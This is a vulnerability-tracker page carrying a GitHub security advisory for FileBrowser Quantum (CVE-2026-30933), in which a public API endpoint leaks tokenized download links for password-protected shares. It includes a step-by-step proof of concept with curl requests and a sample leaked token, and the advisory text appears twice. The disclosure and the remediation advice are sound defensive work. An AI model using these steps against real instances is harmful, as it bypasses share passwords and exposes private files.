Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.5
FileBrowser Quantum: Password-Protected Share Download Links Leaked
GHSA-525j-95gf-766f
CVE-2026-30933
GHSA-525j-95gf-766f
Summary
An issue in FileBrowser Quantum allows anyone to access password-protected shared files by guessing the URL. To fix this, update to a patched version of FileBrowser Quantum, paying close attention to any changes in the share model and API endpoints. If you can't update immediately, consider restricting access to your FileBrowser Quantum instance or disabling the share feature until a patch is applied.
What to do
- Update github.com gtsteffaniak to version 0.0.0-20260307130210-09713b32a5f6.
- Update gtsteffaniak github.com/gtsteffaniak/filebrowser/backend to version 0.0.0-20260307130210-09713b32a5f6.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | gtsteffaniak | <= 0.0.0-20260307130210-09713b32a5f6 | 0.0.0-20260307130210-09713b32a5f6 |
| gtsteffaniak | github.com/gtsteffaniak/filebrowser/backend | <= 0.0.0-20260307130210-09713b32a5f6 | 0.0.0-20260307130210-09713b32a5f6 |
Original title
FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info
Original description
### Summary
The remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.
### Details
The issue stems from two flaws:
1. Tokenized download URLs are written into the persistent share model
```
backend/http/share.go
convertToFrontendShareResponse(line 63)
s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
```
2. The public endpoint:
```
GET /public/api/share/info
returns shareLink.CommonShare without clearing DownloadURL.
```
Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.
The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL
### PoC
1. Create a password protected share as an authenticated user
2. Copy the public share URL (the clipboard WITHOUT an arrow)
`http://yourdomain/public/share/yoursharedhash`
Example:
`http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw`
3. Query the public share endpoint via curl request:
`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' `
Example:
`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' `
Response includes:
```
{
"shareTheme": "default",
"title": "Shared files - test.md",
"description": "A share has been sent to you to view or download.",
"disableSidebar": false,
"downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",
"shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",
"enforceDarkLightMode": "default",
"viewMode": "normal",
"shareType": "normal",
"sidebarLinks": [
{
"name": "Share QR Code and Info",
"category": "shareInfo",
"target": "#",
"icon": "qr_code"
},
{
"name": "Download",
"category": "download",
"target": "#",
"icon": "download"
},
{
"name": "sourceLocation",
"category": "custom",
"target": "/srv/test.md",
"icon": ""
}
],
"hasPassword": true,
"disableLoginOption": false,
"sourceURL": "/srv/test.md"
}
```
Note the response "hasPassword": true and downloadURL includes token= parameter
4. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering
Example:
`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`
Browser downloads file immediately without requiring password
### Impact
An unauthenticated attacker can retrieve password protected shared files without the password.
Results in authentication bypass, unauthorized file access and confidentiality compromise
### Recommended Remediation
Sanitize DownloadURL in public share info responses via `commonShare.DownloadURL = ""` before returning the json response in shareInfoHandler method located in backend/share.go
Structural fix, only generate tokenized URLs after successful password validation
The remediation for CVE-2026-27611 appears incomplete. Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.
### Details
The issue stems from two flaws:
1. Tokenized download URLs are written into the persistent share model
```
backend/http/share.go
convertToFrontendShareResponse(line 63)
s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
```
2. The public endpoint:
```
GET /public/api/share/info
returns shareLink.CommonShare without clearing DownloadURL.
```
Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.
The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL
### PoC
1. Create a password protected share as an authenticated user
2. Copy the public share URL (the clipboard WITHOUT an arrow)
`http://yourdomain/public/share/yoursharedhash`
Example:
`http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw`
3. Query the public share endpoint via curl request:
`curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: */*' `
Example:
`curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: */*' `
Response includes:
```
{
"shareTheme": "default",
"title": "Shared files - test.md",
"description": "A share has been sent to you to view or download.",
"disableSidebar": false,
"downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",
"shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",
"enforceDarkLightMode": "default",
"viewMode": "normal",
"shareType": "normal",
"sidebarLinks": [
{
"name": "Share QR Code and Info",
"category": "shareInfo",
"target": "#",
"icon": "qr_code"
},
{
"name": "Download",
"category": "download",
"target": "#",
"icon": "download"
},
{
"name": "sourceLocation",
"category": "custom",
"target": "/srv/test.md",
"icon": ""
}
],
"hasPassword": true,
"disableLoginOption": false,
"sourceURL": "/srv/test.md"
}
```
Note the response "hasPassword": true and downloadURL includes token= parameter
4. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering
Example:
`http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D`
Browser downloads file immediately without requiring password
### Impact
An unauthenticated attacker can retrieve password protected shared files without the password.
Results in authentication bypass, unauthorized file access and confidentiality compromise
### Recommended Remediation
Sanitize DownloadURL in public share info responses via `commonShare.DownloadURL = ""` before returning the json response in shareInfoHandler method located in backend/share.go
Structural fix, only generate tokenized URLs after successful password validation
ghsa CVSS3.1
7.5
Vulnerability type
CWE-200
Information Exposure
CWE-306
Missing Authentication for Critical Function
CWE-602
- https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-7...
- https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable
- https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta
- https://github.com/advisories/GHSA-525j-95gf-766f
- https://github.com/gtsteffaniak/filebrowser Product
Published: 9 Mar 2026 · Updated: 13 Mar 2026 · First seen: 9 Mar 2026